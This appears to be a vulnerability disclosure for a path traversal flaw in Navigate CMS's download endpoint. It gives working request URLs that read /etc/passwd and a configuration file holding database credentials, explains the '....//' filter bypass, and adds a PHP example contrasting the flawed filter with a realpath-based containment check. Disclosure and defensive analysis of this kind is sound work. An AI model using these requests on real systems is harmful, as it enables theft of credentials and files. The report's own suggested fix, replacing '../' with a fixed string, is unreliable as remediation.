After login, we can see our sid in the cookies. For example, my sid is 161099c65675803ecc8de95ae08d3e12.
Then you can get an arbitrary file by requesting:
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php
You can get some sensitive information such as the MySQL user/password.
analysis
location: navigate_download.php
The filter in navigate\lib\core\core.php removes '../' in a single pass, so we can bypass it by rewriting the sequence as '....//' (each removal leaves a fresh '../' behind).
suggest
You can use replace('../', "hacker") rather than replace('../', "").
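To show why the single-pass replace fails and what a containment check looks like, here is an added example in PHP; it is not Navigate CMS code, and the $base parameter and the sys_get_temp_dir() demo directory are assumptions.

```php
<?php
// Added example, not Navigate CMS code. Two pieces: the single-pass filter the
// report describes, and a containment check that does not rely on stripping.

// Single-pass filter: each '../' is removed exactly once, so a nested '....//'
// collapses into a fresh '../' after the replacement and traversal still works.
function naive_filter(string $id): string
{
    return str_replace('../', '', $id);
}

// Hardened resolver: the requested id is resolved relative to a fixed download
// directory ($base, an assumed parameter) and the canonical result must still
// lie inside that directory, whatever the input looked like.
function resolve_download(string $base, string $id): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;                       // base directory must exist
    }
    if (strpos($id, "\0") !== false) {
        return null;                       // NUL bytes are never legitimate
    }
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $id);
    if ($candidate === false) {
        return null;                       // target does not exist
    }
    // Prefix check with the trailing separator so that /var/dl does not
    // accidentally accept /var/dl-other. realpath() has already resolved
    // '..' segments and symlinks, so the comparison is on canonical paths.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                       // escaped the download directory
    }
    return $candidate;
}

// Constructed inputs in the shape shown in the report.
$payloads = [
    '....//....//....//....//etc/passwd',
    '....//....//cfg/globals.php',
];
foreach ($payloads as $p) {
    printf("input:    %s\n", $p);
    printf("filtered: %s\n", naive_filter($p));      // still contains ../
    $resolved = resolve_download(sys_get_temp_dir(), $p);
    printf("resolved: %s\n\n", $resolved ?? 'rejected');
}
```

Because realpath() follows symlinks, a link inside the download directory that points outside it is rejected as well, which is usually the intended behaviour for a download endpoint.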